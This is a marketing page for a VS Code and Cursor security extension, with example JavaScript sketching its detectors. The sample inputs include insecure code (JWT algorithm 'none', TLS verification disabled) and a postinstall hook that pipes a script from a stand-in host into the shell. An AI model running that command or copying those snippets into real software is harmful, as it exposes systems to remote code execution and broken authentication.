
Vibe Owl Pro

Continuous security automation for developers who vibe code in VS Code and Cursor. Eight features that add background monitoring, deeper detection, and exportable reports — all local-first, no backend required.

$9.99/month (Coming Soon)

What Pro Adds

01

Auto Monitor

Continuous Background Scanning

The scheduler runs two interleaved cycles without manual intervention. Light cycles scan the active file, git history, dependencies, and environment every 8 minutes. Deep cycles run full workspace scans every 30 minutes when the editor is idle for 3+ minutes.

  • Light cycle: active file secrets, git history (40 commits), dependency guard, env audit, staged diff preview
  • Deep cycle: full workspace code scan, full git history, full dependency and environment analysis, host health check
  • Free users can trigger a single deep cycle manually — the periodic scheduler is Pro-only

Settings

  • vibeOwl.autoMonitor.enable
  • vibeOwl.autoMonitor.lightIntervalMinutes (2–60, default: 8)
  • vibeOwl.autoMonitor.deepIntervalMinutes (10–240, default: 30)
  • vibeOwl.autoMonitor.idleMinutes (1–60, default: 3)

02

Startup File Watcher

Real-Time Shell Profile Monitoring

A filesystem watcher monitors macOS shell startup files in real time. The moment a monitored file is modified or created, Vibe Owl runs a host health check. Suspicious payloads trigger an immediate warning modal with a 1-click repair action.

  • Monitors ~/.zshrc, ~/.zprofile, ~/.bash_profile, ~/.bashrc, ~/.profile
  • Catches XCSSET-style persistence that injects encoded payloads into shell profiles
  • Warning modal appears the instant injection happens — before the next terminal session executes it

Settings

  • vibeOwl.proStartupWatcher.enable (default: true)

03

Regression Guard

Baseline New-Risk Tracking

Regression Guard tracks which findings existed at a known-good point in time, then alerts when new risks appear. Set a baseline, and every subsequent scan reports only newly introduced findings with a severity breakdown.

  • Baseline snapshots hash each finding by detector, severity, title, evidence, file path, and line number
  • Catches regressions: a fix that reintroduces a vulnerability, a new dependency with a known-bad pattern, or a teammate's commit with a hardcoded secret
  • Continuous tracking runs automatically after each scan against the stored baseline
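
A sketch of the baseline comparison described above, as an added example rather than Vibe Owl's own code: the six fingerprint fields come from the list, while SHA-256, the finding object shape and the function names are assumptions.

```javascript
// Added example, not Vibe Owl's code. SHA-256 and the finding object shape are
// assumptions; the six fingerprint fields are the ones the page lists.
const { createHash } = require('node:crypto');

const FIELDS = ['detector', 'severity', 'title', 'evidence', 'filePath', 'line'];

function fingerprint(finding) {
  // A JSON array keeps field boundaries unambiguous ("ab"+"c" vs "a"+"bc").
  const material = JSON.stringify(FIELDS.map((f) => String(finding[f] ?? '')));
  return createHash('sha256').update(material).digest('hex');
}

// The baseline stores only hashes, so evidence text is not copied into it.
function createBaseline(findings) {
  return { hashes: [...new Set(findings.map(fingerprint))] };
}

// Returns the findings absent from the baseline plus a per-severity count.
function newRisks(baseline, findings) {
  const known = new Set(baseline.hashes);
  const added = [];
  const bySeverity = {};
  for (const f of findings) {
    const h = fingerprint(f);
    if (known.has(h)) continue;
    known.add(h); // de-duplicate repeats within the same scan
    added.push(f);
    bySeverity[f.severity] = (bySeverity[f.severity] || 0) + 1;
  }
  return { added, bySeverity };
}

// Constructed sample scans (evidence values are redacted placeholders).
const KNOWN_GOOD = [
  { detector: 'generic-api-key', severity: 'high', title: 'API key in source',
    evidence: 'sk-****', filePath: 'src/client.js', line: 12 },
];
const LATER_SCAN = [
  ...KNOWN_GOOD,
  { detector: 'aws-access-key', severity: 'critical', title: 'AWS access key',
    evidence: 'AKIA****', filePath: 'deploy/env.js', line: 3 },
  { detector: 'generic-api-key', severity: 'high', title: 'API key in source',
    evidence: 'sk-****', filePath: 'src/client.js', line: 14 }, // same finding, moved two lines
];
```

In this sketch the line number is part of the fingerprint, so a finding that only moves to a different line is reported as new.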

04

Pro Vulnerability Detectors

8 Extended Scan Rules

Eight additional detection rules target application-level vulnerabilities beyond secret detection. Four rules fire on all files in real time. Four boundary detectors fire only on server-side files to catch API-layer risks.

  • Real-time rules: JWT algorithm:none bypass, deprecated crypto.createCipher, disabled TLS certificate verification, HTTPS agent with TLS disabled
  • Boundary rules: Express JSON parser without body-size limits, unbounded pagination input, Multer upload without size/type guardrails, missing route-level rate limiting
  • 49 total detectors (41 free + 8 Pro) covering secrets, credentials, code risks, and application vulnerabilities

05

Pro Real-Time Alerts

Toast Notifications While You Type

Pro vulnerability detectors fire during active editing — not just on save. An instant toast notification appears the moment a detected vulnerability is written, with a 45-second cooldown per unique detector and line combination to prevent notification spam.

  • Alerts fire on medium, high, and critical severity findings only
  • Example: "Vibe Owl Pro real-time alert (high): JWT with algorithm 'none' detected (line 42)"
  • Catches vulnerabilities in AI-generated code the instant Cursor or Copilot writes them

Settings

  • vibeOwl.proRealtimeAlerts.enable (default: true)
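
The four real-time rules from the detector list and the alert behaviour described here (medium-and-above severities, a 45-second cooldown per detector and line) can be sketched as follows. This is an added example, not Vibe Owl's code; the regexes, rule ids, severities and sample source are assumptions.

```javascript
// Added example, not Vibe Owl's rules: patterns, ids and severities are illustrative.
const RULES = [
  { id: 'jwt-alg-none', severity: 'high', title: "JWT with algorithm 'none'",
    re: /algorithms?\s*:\s*\[?\s*['"]none['"]/i },
  { id: 'crypto-createcipher', severity: 'medium', title: 'Deprecated crypto.createCipher',
    re: /\bcreateCipher\s*\(/ }, // does not match createCipheriv(
  { id: 'tls-verify-disabled', severity: 'high', title: 'TLS certificate verification disabled',
    re: /NODE_TLS_REJECT_UNAUTHORIZED\s*['"]?\]?\s*=\s*['"]?0/ },
  { id: 'https-agent-insecure', severity: 'high', title: 'HTTPS agent with TLS verification disabled',
    re: /rejectUnauthorized\s*:\s*false/ },
];

const COOLDOWN_MS = 45_000; // from the page: 45 s per detector and line
const ALERT_LEVELS = new Set(['medium', 'high', 'critical']);

function createAlerter() {
  const lastFired = new Map(); // "ruleId:line" -> time of the last toast
  return function scan(text, now = Date.now()) {
    const alerts = [];
    text.split('\n').forEach((src, i) => {
      for (const rule of RULES) {
        if (!rule.re.test(src) || !ALERT_LEVELS.has(rule.severity)) continue;
        const key = `${rule.id}:${i + 1}`;
        const prev = lastFired.get(key);
        if (prev !== undefined && now - prev < COOLDOWN_MS) continue; // still cooling down
        lastFired.set(key, now);
        alerts.push(`real-time alert (${rule.severity}): ${rule.title} detected (line ${i + 1})`);
      }
    });
    return alerts;
  };
}

// Constructed sample buffer, as an editor might hold it mid-edit.
const SAMPLE = [
  "const jwt = require('jsonwebtoken');",
  "const claims = jwt.verify(token, key, { algorithms: ['none'] });",
  "const c = crypto.createCipher('aes-256-cbc', password);",
  "const ok = crypto.createCipheriv('aes-256-gcm', k, iv);",
  "const agent = new https.Agent({ rejectUnauthorized: false });",
].join('\n');
```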

06

Pro Dependency Intelligence

Advanced Supply-Chain Analysis

Extends the free dependency guard with deeper package manifest and lockfile analysis. Flags projects with excessive dependency counts, prerelease versions, lifecycle script exposure, deprecated packages, external registry resolutions, and insecure HTTP URLs in lockfiles.

  • Package manifest: 180+ dependencies = high risk, 90+ = medium risk, detects prerelease versions and lifecycle script shell execution
  • Lockfile: counts install scripts, deprecated packages, 0.x versions, external resolutions, and insecure HTTP URLs
  • Findings tagged with category "intel" to distinguish from basic dependency issues
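
The manifest and lockfile checks listed above, sketched for `package.json` and an npm `package-lock.json` (lockfileVersion 2 or 3). This is an added example, not Vibe Owl's code: the 180/90 thresholds and the "intel" category come from the page, while the other severities, the regexes and the meaning of "external" are assumptions.

```javascript
// Added example, not Vibe Owl's code. The 180/90 thresholds and the "intel"
// category come from the page; other severities and patterns are assumptions.
const HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

function analyzeManifest(pkg) {
  const deps = { ...pkg.dependencies, ...pkg.devDependencies };
  const count = Object.keys(deps).length;
  const findings = [];
  const add = (severity, title) => findings.push({ category: 'intel', severity, title });
  if (count >= 180) add('high', `${count} dependencies`);
  else if (count >= 90) add('medium', `${count} dependencies`);
  for (const [name, range] of Object.entries(deps)) {
    // semver prerelease tag, e.g. 2.0.0-beta.1 (not the "1.0.0 - 2.0.0" range form)
    if (/\d+\.\d+\.\d+-[0-9A-Za-z]/.test(range)) add('medium', `prerelease: ${name}@${range}`);
  }
  for (const hook of HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (cmd && /\b(curl|wget|bash|sh)\b|\|/.test(cmd)) add('high', `shell execution in ${hook} script`);
  }
  return findings;
}

function analyzeLockfile(lock) {
  const c = { installScripts: 0, deprecated: 0, zeroMajor: 0, externalResolved: 0, insecureHttp: 0 };
  for (const [path, p] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // root project entry in lockfileVersion 2/3
    if (p.hasInstallScript) c.installScripts++;
    if (p.deprecated) c.deprecated++;
    if (/^0\./.test(p.version || '')) c.zeroMajor++;
    if (!p.resolved) continue;
    if (p.resolved.startsWith('http://')) c.insecureHttp++;
    // Assumption: "external" means anything other than the public npm registry over HTTPS.
    if (!p.resolved.startsWith('https://registry.npmjs.org/')) c.externalResolved++;
  }
  return c;
}

// Constructed sample inputs (package names and URLs are made up).
const SAMPLE_MANIFEST = {
  dependencies: { 'left-widget': '^1.4.0', 'beta-thing': '2.0.0-beta.1' },
  scripts: { postinstall: 'curl -fsSL https://example.invalid/setup.sh | sh', test: 'node test.js' },
};
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  '': { name: 'demo', version: '1.0.0' },
  'node_modules/left-widget': { version: '1.4.2', resolved: 'https://registry.npmjs.org/left-widget/-/left-widget-1.4.2.tgz' },
  'node_modules/old-helper': { version: '0.9.0', hasInstallScript: true, deprecated: 'use other-helper',
    resolved: 'http://mirror.example.invalid/old-helper-0.9.0.tgz' },
} };
```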

07

Security Learning Report

Markdown Generation

Generates a comprehensive security report as a Markdown file. The report collects all findings from code scanning, git history, dependencies, environment, and host health into a single document with workspace name, health score, and health rating.

  • Saved to .vibe-owl-reports/security-learning-report-{timestamp}.md
  • Opens automatically in the editor after generation
  • Covers every scan module: code, git, dependencies, environment, host health

08

Security Learning Report

PDF Export

Exports the same security learning report as a styled PDF document using PDFKit. Same comprehensive content as the Markdown report, formatted for sharing with teams, compliance reviews, or audit trails.

  • Professional formatting for stakeholder communication
  • Same data as Markdown report: findings, health score, severity breakdown
  • Ready for compliance documentation and security audits

What Free Already Includes

Vibe Owl Free is not a trial. Every core protection module ships on the free plan.

  • 41 detector rules (secrets, credentials, API keys, entropy, code risks, malware patterns)
  • Git safety hooks (pre-commit and pre-push)
  • Host health check (macOS malware, XCSSET, RAT, LaunchDaemon, XProtect)
  • .env hygiene audit and .env.example sync
  • Dependency risk guard (package.json and lockfiles)
  • CLI install safety (terminal command evaluation)
  • Safe cleanup with local backup and 1-click revert
  • Findings panel with inline fix/open actions
  • Allowlist management and false positive trainer
  • Key rotation playbooks (OpenAI, GitHub, AWS)
  • Policy bundles (Prototype Fast, Startup Balanced, Regulated Strict)
  • Preflight check (unified pre-share safety gate)

Ship safer code today

Start with the full-featured free plan. Upgrade to Pro for $9.99/month to unlock continuous automation, deeper detection, and exportable reports.
